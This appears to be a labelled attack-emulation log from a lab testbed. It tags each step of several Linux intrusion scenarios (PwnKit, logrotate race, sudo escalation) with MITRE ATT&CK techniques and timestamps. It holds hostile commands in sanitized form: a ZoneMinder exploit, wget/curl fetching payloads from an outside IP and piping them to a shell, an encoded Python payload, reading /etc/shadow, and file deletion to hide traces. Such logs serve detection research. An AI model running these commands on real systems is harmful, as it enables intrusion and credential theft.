1_pwnkit_pam;execution;T1059;NA;10;stty_rows_38_columns_116;1758527341.409998;1758527348.0
1_pwnkit_pam;execution;T1059;NA;11;export_PS1__PWN__;1758527357.770718;1758527365.0
1_pwnkit_pam;execution;T1059;NA;12;chmod__x_linpeas_sh;1758527374.077296;1758527381.0
1_pwnkit_pam;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758527390.392265;1758527996.0
1_pwnkit_pam;discovery;T1033;NA;14;id;1758528005.57235;1758528011.0
1_pwnkit_pam;command-and-control;T1105;NA;35;wget_http___192_42_1_174_PwnKit____dev_null_2__1;1758528020.761762;1758528028.0
1_pwnkit_pam;privilege-escalation;T1068;NA;36;chmod__x_PwnKit______PwnKit;1758528037.126957;1758528044.0
1_pwnkit_pam;discovery;T1033;NA;37;id;1758528053.441452;1758528060.0
1_pwnkit_pam;command-and-controlcredential-access_defense-evasion_persistence;T1105_T1556.003;NA;41;cd__root__wget__O_README_txt_http___192_42_1_174_README_txt_4;1758528069.804766;1758528077.0
1_pwnkit_pam;defense-evasioncredential-access_defense-evasion_persistence;T1218_T1556.003;NA;42;split___filter__cat__FILE___xargs_bash__c____C_2000_README_txt;1758528086.12594;1758528093.0
1_pwnkit_pam;defense-evasion;T1070.004;NA;40;rm;1758528102.405069;1758528109.0
1_pwnkit_pam;defense-evasion;T1070.004;NA;40;rm;1758528135.096738;1758528142.0
1_pwnkit_pam;defense-evasion;T1070.004;NA;40;rm;1758528151.362522;1758528188.0
1_pwnkit_pam;discovery;T1033;NA;23;id;1758528214.003416;1758528220.0
1_pwnkit_pam;credential-access;T1003.008;NA;24;cat__etc_shadow;1758528244.279949;1758528250.0
1_pwnkit_pam;discovery;T1120;NA;25;lspci;1758528259.318452;1758528265.0
1_pwnkit_pam;discovery;T1120;NA;26;command__v_lsusb;1758528274.368905;1758528280.0
1_pwnkit_pam;discovery;T1124;NA;27;date;1758528289.403382;1758528295.0
1_pwnkit_pam;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758528304.422983;1758528340.0
1_pwnkit_sshkey;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758116138.049118;1758116148.0
1_pwnkit_sshkey;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758116157.726172;1758116176.0
1_pwnkit_sshkey;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758116185.834255;1758116238.0
1_pwnkit_sshkey;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758116247.113977;1758116349.0
1_pwnkit_sshkey;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758116358.381726;1758116411.0
1_pwnkit_sshkey;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758116436.940741;1758116444.0
1_pwnkit_sshkey;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758116469.610732;1758116476.0
1_pwnkit_sshkey;execution;T1059;NA;8;export_SHELL_bash;1758116485.929767;1758116493.0
1_pwnkit_sshkey;execution;T1059;NA;9;export_TERM_xterm256_color;1758116502.254137;1758116509.0
1_pwnkit_sshkey;execution;T1059;NA;10;stty_rows_38_columns_116;1758116518.618127;1758116525.0
1_pwnkit_sshkey;execution;T1059;NA;11;export_PS1__PWN__;1758116534.98066;1758116542.0
1_pwnkit_sshkey;execution;T1059;NA;12;chmod__x_linpeas_sh;1758116551.346538;1758116558.0
1_pwnkit_sshkey;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758116567.668194;1758117173.0
1_pwnkit_sshkey;discovery;T1033;NA;14;id;1758117182.94761;1758117189.0
1_pwnkit_sshkey;command-and-control;T1105;NA;35;wget_http___192_42_1_174_PwnKit____dev_null_2__1;1758117198.171334;1758117205.0
1_pwnkit_sshkey;privilege-escalation;T1068;NA;36;chmod__x_PwnKit______PwnKit;1758117214.487099;1758117221.0
1_pwnkit_sshkey;discovery;T1033;NA;37;id;1758117230.734389;1758117238.0
1_pwnkit_sshkey;command-and-controlpersistence_privilege-escalation;T1105_T1098.004;NA;43;cd__root__wget_http___192_42_1_174_README_txt;1758117247.05672;1758117254.0
1_pwnkit_sshkey;defense-evasionpersistence_privilege-escalation;T1218_T1098.004;NA;44;split___filter__cat__FILE___xargs_bash__c____C_2000_README_txt;1758117263.421778;1758117270.0
1_pwnkit_sshkey;defense-evasion;T1070.004;NA;40;rm;1758117279.827845;1758117287.0
1_pwnkit_sshkey;defense-evasion;T1070.004;NA;40;rm;1758117312.506569;1758117319.0
1_pwnkit_sshkey;defense-evasion;T1070.004;NA;40;rm;1758117328.8718;1758117366.0
1_pwnkit_sshkey;discovery;T1033;NA;23;id;1758117391.597199;1758117398.0
1_pwnkit_sshkey;credential-access;T1003.008;NA;24;cat__etc_shadow;1758117422.21856;1758117428.0
1_pwnkit_sshkey;discovery;T1120;NA;25;lspci;1758117437.242699;1758117443.0
1_pwnkit_sshkey;discovery;T1120;NA;26;command__v_lsusb;1758117452.292671;1758117458.0
1_pwnkit_sshkey;discovery;T1124;NA;27;date;1758117467.316853;1758117473.0
1_pwnkit_sshkey;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758117482.335585;1758117518.0
1_racecondition_localaccount;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1764940818.969356;1764940829.0
1_racecondition_localaccount;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1764940838.980146;1764940858.0
1_racecondition_localaccount;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1764940867.077353;1764940916.0
1_racecondition_localaccount;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1764940925.545733;1764941027.0
1_racecondition_localaccount;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1764941036.908777;1764941087.0
1_racecondition_localaccount;command-and-control;T1105;NA;45;upload__var_www_html_logrotten;1764941113.499548;1764941120.0
1_racecondition_localaccount;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1764941129.820785;1764941137.0
1_racecondition_localaccount;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1764941162.460073;1764941169.0
1_racecondition_localaccount;execution;T1059;NA;8;export_SHELL_bash;1764941178.694212;1764941186.0
1_racecondition_localaccount;execution;T1059;NA;9;export_TERM_xterm256_color;1764941195.061192;1764941202.0
1_racecondition_localaccount;execution;T1059;NA;10;stty_rows_38_columns_116;1764941211.374693;1764941218.0
1_racecondition_localaccount;execution;T1059;NA;11;export_PS1__PWN__;1764941227.749459;1764941235.0
1_racecondition_localaccount;execution;T1059;NA;46;chmod__x_logrotten;1764941244.07444;1764941251.0
1_racecondition_localaccount;execution;T1059;NA;12;chmod__x_linpeas_sh;1764941260.449106;1764941267.0
1_racecondition_localaccount;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1764941276.773842;1764941884.0
1_racecondition_localaccount;discovery;T1033;NA;14;id;1764941893.099862;1764941899.0
1_racecondition_localaccount;privilege-escalation_persistence;T1546;NA;47;cd__var_www_default;1764941908.339701;1764941915.0
1_racecondition_localaccount;privilege-escalation_persistence;T1546;NA;48;echo__if_____id__u____eq_0____then_____echo_exec____import______zlib_____decompress____import______base64_____b64decode____import______codecs_____getencoder____utf_8________eNo9UE1LxDAQPTe_IrckGMO2xhUXK4h4EBHB3ZuItMmooWkakqxWxf9uQxbnMMObefPmw4x_CgnHSQ2Q_Lc1Pe_7CGvJYwp7lXgyI6DXKeAZG4dD596A1iu2QVUKX4uvYluaRQm04Qe8fbi_e9nuHm_u7lnmCTU5BypRSurzRshG1KI_k4SfLMYypQ_QDaiCWYFPWTsPF9ECeHrKkG3LTmLvfKcGSi5vCY8igPqgkrGn1TPS7QFbhj7fjQVswVHNLuwip4__q8clzRDMoGg_W2hQ0_gDxEjLB0S_ljmpITP5D4lkE38Z_gPO1l75______0___________exec___which_python____which_python3____which_python2______sh____fi____payload;1764941924.7;1764941931.0
1_racecondition_localaccount;privilege-escalation_persistence;T1546;NA;49;rm;1764941940.965068;1764941948.0
1_racecondition_localaccount;privilege-escalation_persistence;T1546;NA;50;mkdir_log;1764941957.318863;1764941964.0
1_racecondition_localaccount;privilege-escalation_persistence;T1546;NA;51;echo_empty___log_accesss_log;1764941973.596597;1764941980.0
1_racecondition_localaccount;privilege-escalation_persistence;T1546;NA;52;_tmp_logrotten__p__var_www_default_payload__var_www_default_log_accesss_log;1764941989.958567;1764943617.0
1_racecondition_localaccount;execution;T1059;NA;17;python3__c__import_pty_pty_spawn___bash_____;1764943619.492274;1764943626.0
1_racecondition_localaccount;execution;T1059;NA;18;export_SHELL_bash;1764943635.864377;1764943643.0
1_racecondition_localaccount;execution;T1059;NA;19;export_TERM_xterm256_color;1764943652.235804;1764943659.0
1_racecondition_localaccount;discovery;T1033;NA;20;id;1764943684.843396;1764943692.0
1_racecondition_localaccount;command-and-controlpersistence;T1105_T1136.001;NA;21;curl_http___192_42_1_174_README_txt_3___sh;1764943701.15052;1764943748.0
1_racecondition_localaccount;discovery;T1033;NA;22;id;1764943757.52622;1764943795.0
1_racecondition_localaccount;discovery;T1033;NA;23;id;1764943835.386226;1764943841.0
1_racecondition_localaccount;credential-access;T1003.008;NA;24;cat__etc_shadow;1764943865.974801;1764943872.0
1_racecondition_localaccount;discovery;T1120;NA;25;lspci;1764943881.007924;1764943887.0
1_racecondition_localaccount;discovery;T1120;NA;26;command__v_lsusb;1764943896.054643;1764943902.0
1_racecondition_localaccount;discovery;T1124;NA;27;date;1764943911.083663;1764943917.0
1_racecondition_localaccount;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1764943926.100459;1764943962.0
1_racecondition_pam;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1765031791.486185;1765031802.0
1_racecondition_pam;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1765031811.642996;1765031830.0
1_racecondition_pam;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1765031839.76486;1765031889.0
1_racecondition_pam;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1765031898.405889;1765032000.0
1_racecondition_pam;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1765032009.63012;1765032066.0
1_racecondition_pam;command-and-control;T1105;NA;45;upload__var_www_html_logrotten;1765032092.323715;1765032099.0
1_racecondition_pam;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1765032108.603394;1765032115.0
1_racecondition_pam;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1765032141.278635;1765032148.0
1_racecondition_pam;execution;T1059;NA;8;export_SHELL_bash;1765032157.653448;1765032165.0
1_racecondition_pam;execution;T1059;NA;9;export_TERM_xterm256_color;1765032174.025009;1765032181.0
1_racecondition_pam;execution;T1059;NA;10;stty_rows_38_columns_116;1765032190.354011;1765032197.0
1_racecondition_pam;execution;T1059;NA;11;export_PS1__PWN__;1765032206.673304;1765032214.0
1_racecondition_pam;execution;T1059;NA;46;chmod__x_logrotten;1765032223.044809;1765032230.0
1_racecondition_pam;execution;T1059;NA;12;chmod__x_linpeas_sh;1765032239.279798;1765032246.0
1_racecondition_pam;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1765032255.552922;1765032862.0
1_racecondition_pam;discovery;T1033;NA;14;id;1765032871.886124;1765032878.0
1_racecondition_pam;privilege-escalation_persistence;T1546;NA;47;cd__var_www_default;1765032887.091693;1765032894.0
1_racecondition_pam;privilege-escalation_persistence;T1546;NA;48;echo__if_____id__u____eq_0____then_____echo_exec____import______zlib_____decompress____import______base64_____b64decode____import______codecs_____getencoder____utf_8________eNo9UE1LxDAQPTe_IrckGMO2xhUXK4h4EBHB3ZuItMmooWkakqxWxf9uQxbnMMObefPmw4x_CgnHSQ2Q_Lc1Pe_7CGvJYwp7lXgyI6DXKeAZG4dD596A1iu2QVUKX4uvYluaRQm04Qe8fbi_e9nuHm_u7lnmCTU5BypRSurzRshG1KI_k4SfLMYypQ_QDaiCWYFPWTsPF9ECeHrKkG3LTmLvfKcGSi5vCY8igPqgkrGn1TPS7QFbhj7fjQVswVHNLuwip4__q8clzRDMoGg_W2hQ0_gDxEjLB0S_ljmpITP5D4lkE38Z_gPO1l75______0___________exec___which_python____which_python3____which_python2______sh____fi____payload;1765032903.462723;1765032910.0
1_racecondition_pam;privilege-escalation_persistence;T1546;NA;49;rm;1765032919.642859;1765032927.0
1_racecondition_pam;privilege-escalation_persistence;T1546;NA;50;mkdir_log;1765032936.011704;1765032943.0
1_racecondition_pam;privilege-escalation_persistence;T1546;NA;51;echo_empty___log_accesss_log;1765032952.387224;1765032959.0
1_racecondition_pam;privilege-escalation_persistence;T1546;NA;52;_tmp_logrotten__p__var_www_default_payload__var_www_default_log_accesss_log;1765032968.7094;1765034636.0
1_racecondition_pam;execution;T1059;NA;17;python3__c__import_pty_pty_spawn___bash_____;1765034639.945052;1765034647.0
1_racecondition_pam;execution;T1059;NA;18;export_SHELL_bash;1765034656.185826;1765034663.0
1_racecondition_pam;execution;T1059;NA;19;export_TERM_xterm256_color;1765034672.557695;1765034679.0
1_racecondition_pam;discovery;T1033;NA;20;id;1765034705.189427;1765034712.0
1_racecondition_pam;command-and-controlcredential-access_defense-evasion_persistence;T1105_T1556.003;NA;29;curl_http___192_42_1_174_README_txt_5___sh;1765034721.422592;1765034768.0
1_racecondition_pam;discovery;T1033;NA;22;id;1765034777.791021;1765034813.0
1_racecondition_pam;discovery;T1033;NA;23;id;1765034855.568805;1765034861.0
1_racecondition_pam;credential-access;T1003.008;NA;24;cat__etc_shadow;1765034885.838599;1765034891.0
1_racecondition_pam;discovery;T1120;NA;25;lspci;1765034900.887925;1765034906.0
1_racecondition_pam;discovery;T1120;NA;26;command__v_lsusb;1765034915.979945;1765034922.0
1_racecondition_pam;discovery;T1124;NA;27;date;1765034931.016134;1765034937.0
1_racecondition_pam;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1765034946.031964;1765034982.0
1_racecondition_sshkey;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1765301167.041955;1765301177.0
1_racecondition_sshkey;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1765301186.022941;1765301205.0
1_racecondition_sshkey;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1765301214.149395;1765301267.0
1_racecondition_sshkey;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1765301276.047597;1765301377.0
1_racecondition_sshkey;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1765301386.884112;1765301443.0
1_racecondition_sshkey;command-and-control;T1105;NA;45;upload__var_www_html_logrotten;1765301469.507631;1765301476.0
1_racecondition_sshkey;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1765301485.863477;1765301493.0
1_racecondition_sshkey;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1765301518.528884;1765301525.0
1_racecondition_sshkey;execution;T1059;NA;8;export_SHELL_bash;1765301534.894591;1765301542.0
1_racecondition_sshkey;execution;T1059;NA;9;export_TERM_xterm256_color;1765301551.211196;1765301558.0
1_racecondition_sshkey;execution;T1059;NA;10;stty_rows_38_columns_116;1765301567.565409;1765301574.0
1_racecondition_sshkey;execution;T1059;NA;11;export_PS1__PWN__;1765301583.883965;1765301591.0
1_racecondition_sshkey;execution;T1059;NA;46;chmod__x_logrotten;1765301600.223855;1765301607.0
1_racecondition_sshkey;execution;T1059;NA;12;chmod__x_linpeas_sh;1765301616.496847;1765301623.0
1_racecondition_sshkey;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1765301632.769362;1765302240.0
1_racecondition_sshkey;discovery;T1033;NA;14;id;1765302249.009295;1765302255.0
1_racecondition_sshkey;privilege-escalation_persistence;T1546;NA;47;cd__var_www_default;1765302264.288692;1765302271.0
1_racecondition_sshkey;privilege-escalation_persistence;T1546;NA;48;echo__if_____id__u____eq_0____then_____echo_exec____import______zlib_____decompress____import______base64_____b64decode____import______codecs_____getencoder____utf_8________eNo9UE1LxDAQPTe_IrckGMO2xhUXK4h4EBHB3ZuItMmooWkakqxWxf9uQxbnMMObefPmw4x_CgnHSQ2Q_Lc1Pe_7CGvJYwp7lXgyI6DXKeAZG4dD596A1iu2QVUKX4uvYluaRQm04Qe8fbi_e9nuHm_u7lnmCTU5BypRSurzRshG1KI_k4SfLMYypQ_QDaiCWYFPWTsPF9ECeHrKkG3LTmLvfKcGSi5vCY8igPqgkrGn1TPS7QFbhj7fjQVswVHNLuwip4__q8clzRDMoGg_W2hQ0_gDxEjLB0S_ljmpITP5D4lkE38Z_gPO1l75______0___________exec___which_python____which_python3____which_python2______sh____fi____payload;1765302280.512243;1765302287.0
1_racecondition_sshkey;privilege-escalation_persistence;T1546;NA;49;rm;1765302296.793497;1765302304.0
1_racecondition_sshkey;privilege-escalation_persistence;T1546;NA;50;mkdir_log;1765302313.070087;1765302320.0
1_racecondition_sshkey;privilege-escalation_persistence;T1546;NA;51;echo_empty___log_accesss_log;1765302329.433574;1765302336.0
1_racecondition_sshkey;privilege-escalation_persistence;T1546;NA;52;_tmp_logrotten__p__var_www_default_payload__var_www_default_log_accesss_log;1765302345.795364;1765303984.0
1_racecondition_sshkey;execution;T1059;NA;17;python3__c__import_pty_pty_spawn___bash_____;1765303995.923855;1765304003.0
1_racecondition_sshkey;execution;T1059;NA;18;export_SHELL_bash;1765304012.284626;1765304019.0
1_racecondition_sshkey;execution;T1059;NA;19;export_TERM_xterm256_color;1765304028.641271;1765304035.0
1_racecondition_sshkey;discovery;T1033;NA;20;id;1765304061.318048;1765304068.0
1_racecondition_sshkey;command-and-controlpersistence_privilege-escalation;T1105_T1098.004;NA;30;curl_http___192_42_1_174_README_txt_1___sh;1765304077.49501;1765304124.0
1_racecondition_sshkey;discovery;T1033;NA;22;id;1765304133.870236;1765304170.0
1_racecondition_sshkey;discovery;T1033;NA;23;id;1765304211.837337;1765304218.0
1_racecondition_sshkey;credential-access;T1003.008;NA;24;cat__etc_shadow;1765304242.334289;1765304248.0
1_racecondition_sshkey;discovery;T1120;NA;25;lspci;1765304257.354626;1765304263.0
1_racecondition_sshkey;discovery;T1120;NA;26;command__v_lsusb;1765304272.396506;1765304278.0
1_racecondition_sshkey;discovery;T1124;NA;27;date;1765304287.427268;1765304293.0
1_racecondition_sshkey;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1765304302.451498;1765304338.0
1_sudo_localaccount;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758538540.437451;1758538551.0
1_sudo_localaccount;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758538560.601567;1758538579.0
1_sudo_localaccount;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758538588.728395;1758538639.0
1_sudo_localaccount;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758538648.131358;1758538749.0
1_sudo_localaccount;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758538758.927385;1758538811.0
1_sudo_localaccount;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758538837.464252;1758538844.0
1_sudo_localaccount;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758538870.206097;1758538877.0
1_sudo_localaccount;execution;T1059;NA;8;export_SHELL_bash;1758538886.562283;1758538893.0
1_sudo_localaccount;execution;T1059;NA;9;export_TERM_xterm256_color;1758538902.934745;1758538910.0
1_sudo_localaccount;execution;T1059;NA;10;stty_rows_38_columns_116;1758538919.250469;1758538926.0
1_sudo_localaccount;execution;T1059;NA;11;export_PS1__PWN__;1758538935.622411;1758538942.0
1_sudo_localaccount;execution;T1059;NA;12;chmod__x_linpeas_sh;1758538951.887105;1758538959.0
1_sudo_localaccount;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758538968.214755;1758539575.0
1_sudo_localaccount;discovery;T1033;NA;14;id;1758539584.524763;1758539590.0
1_sudo_localaccount;privilege-escalation_defense-evasion;T1548.003;NA;53;dmesg__H;1758539599.67584;1758539605.0
1_sudo_localaccount;privilege-escalation_defense-evasion;T1548.003;NA;54;_bash;1758539614.909794;1758539622.0
1_sudo_localaccount;discovery;T1033;NA;37;id;1758539631.188209;1758539638.0
1_sudo_localaccount;command-and-controlpersistence;T1105_T1136.001;NA;38;cd__root__wget__O_README_txt_http___192_42_1_174_README_txt_2;1758539647.561268;1758539654.0
1_sudo_localaccount;defense-evasionpersistence;T1218_T1136.001;NA;39;split___filter__cat__FILE___xargs_bash__c____C_2000_README_txt;1758539663.927446;1758539671.0
1_sudo_localaccount;defense-evasion;T1070.004;NA;40;rm;1758539680.115667;1758539687.0
1_sudo_localaccount;defense-evasion;T1070.004;NA;40;rm;1758539712.798404;1758539750.0
1_sudo_localaccount;discovery;T1033;NA;23;id;1758539775.508689;1758539782.0
1_sudo_localaccount;credential-access;T1003.008;NA;24;cat__etc_shadow;1758539806.096683;1758539812.0
1_sudo_localaccount;discovery;T1120;NA;25;lspci;1758539821.128032;1758539827.0
1_sudo_localaccount;discovery;T1120;NA;26;command__v_lsusb;1758539836.179016;1758539842.0
1_sudo_localaccount;discovery;T1124;NA;27;date;1758539851.211379;1758539857.0
1_sudo_localaccount;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758539866.225465;1758539902.0
1_sudo_pam;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758548923.914565;1758548933.0
1_sudo_pam;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758548942.51878;1758548961.0
1_sudo_pam;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758548970.635068;1758549021.0
1_sudo_pam;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758549030.305495;1758549132.0
1_sudo_pam;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758549141.317936;1758549198.0
1_sudo_pam;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758549223.841396;1758549231.0
1_sudo_pam;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758549256.520174;1758549263.0
1_sudo_pam;execution;T1059;NA;8;export_SHELL_bash;1758549272.878174;1758549280.0
1_sudo_pam;execution;T1059;NA;9;export_TERM_xterm256_color;1758549289.251623;1758549296.0
1_sudo_pam;execution;T1059;NA;10;stty_rows_38_columns_116;1758549305.636377;1758549312.0
1_sudo_pam;execution;T1059;NA;11;export_PS1__PWN__;1758549321.998459;1758549329.0
1_sudo_pam;execution;T1059;NA;12;chmod__x_linpeas_sh;1758549338.220715;1758549345.0
1_sudo_pam;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758549354.594335;1758549961.0
1_sudo_pam;discovery;T1033;NA;14;id;1758549970.930683;1758549977.0
1_sudo_pam;privilege-escalation_defense-evasion;T1548.003;NA;53;dmesg__H;1758549986.136474;1758549992.0
1_sudo_pam;privilege-escalation_defense-evasion;T1548.003;NA;54;_bash;1758550001.284033;1758550008.0
1_sudo_pam;discovery;T1033;NA;37;id;1758550017.661578;1758550024.0
1_sudo_pam;command-and-controlcredential-access_defense-evasion_persistence;T1105_T1556.003;NA;41;cd__root__wget__O_README_txt_http___192_42_1_174_README_txt_4;1758550033.971087;1758550041.0
1_sudo_pam;defense-evasioncredential-access_defense-evasion_persistence;T1218_T1556.003;NA;42;split___filter__cat__FILE___xargs_bash__c____C_2000_README_txt;1758550050.3347;1758550057.0
1_sudo_pam;defense-evasion;T1070.004;NA;40;rm;1758550066.702795;1758550073.0
1_sudo_pam;defense-evasion;T1070.004;NA;40;rm;1758550099.330234;1758550136.0
1_sudo_pam;discovery;T1033;NA;23;id;1758550162.030431;1758550168.0
1_sudo_pam;credential-access;T1003.008;NA;24;cat__etc_shadow;1758550192.411737;1758550198.0
1_sudo_pam;discovery;T1120;NA;25;lspci;1758550207.443136;1758550213.0
1_sudo_pam;discovery;T1120;NA;26;command__v_lsusb;1758550222.504126;1758550228.0
1_sudo_pam;discovery;T1124;NA;27;date;1758550237.547908;1758550243.0
1_sudo_pam;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758550252.567193;1758550288.0
1_sudo_sshkey;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758531536.031461;1758531547.0
1_sudo_sshkey;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758531556.350862;1758531575.0
1_sudo_sshkey;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758531584.453764;1758531635.0
1_sudo_sshkey;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758531644.639806;1758531752.0
1_sudo_sshkey;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758531761.708097;1758531814.0
1_sudo_sshkey;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758531840.508579;1758531847.0
1_sudo_sshkey;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758531873.153882;1758531880.0
1_sudo_sshkey;execution;T1059;NA;8;export_SHELL_bash;1758531889.518481;1758531896.0
1_sudo_sshkey;execution;T1059;NA;9;export_TERM_xterm256_color;1758531905.803606;1758531913.0
1_sudo_sshkey;execution;T1059;NA;10;stty_rows_38_columns_116;1758531922.129407;1758531929.0
1_sudo_sshkey;execution;T1059;NA;11;export_PS1__PWN__;1758531938.431278;1758531945.0
1_sudo_sshkey;execution;T1059;NA;12;chmod__x_linpeas_sh;1758531954.710148;1758531962.0
1_sudo_sshkey;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758531971.077967;1758532578.0
1_sudo_sshkey;discovery;T1033;NA;14;id;1758532587.452316;1758532593.0
1_sudo_sshkey;privilege-escalation_defense-evasion;T1548.003;NA;53;dmesg__H;1758532602.660471;1758532608.0
